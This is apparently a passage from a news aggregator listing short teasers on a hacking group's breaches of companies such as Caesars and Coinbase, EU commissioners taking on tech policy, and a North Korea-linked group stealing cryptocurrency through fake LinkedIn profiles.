The prolific hacking group broke into Caesars Entertainment, Coinbase, DoorDash, Mailchimp, Riot Games, Twilio (twice), and dozens more. 

© 2024 TechCrunch. All rights reserved. For personal use only.

Security News | TechCrunch – ​Read More

Meet three incoming EU lawmakers in charge of key tech policy areas

/in

The European Union looks to have clinched political agreement on the team of 26 commissioners who will be implementing President Ursula von der Leyen’s policy plan for the next five years. A final vote is still pending next week, but on Thursday, Politico’s Brussels Playbook newsletter reported a deal in the European Parliament on the […]

© 2024 TechCrunch. All rights reserved. For personal use only.

Security News | TechCrunch – ​Read More

North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn

/in

The North Korea-linked threat actor known as Sapphire Sleet is estimated to have stolen more than $10 million worth of cryptocurrency as part of social engineering campaigns orchestrated over a six-month period.
These findings come from Microsoft, which said that multiple threat activity clusters with ties to the country have been observed creating fake profiles on LinkedIn, posing as both

The Hacker News – ​Read More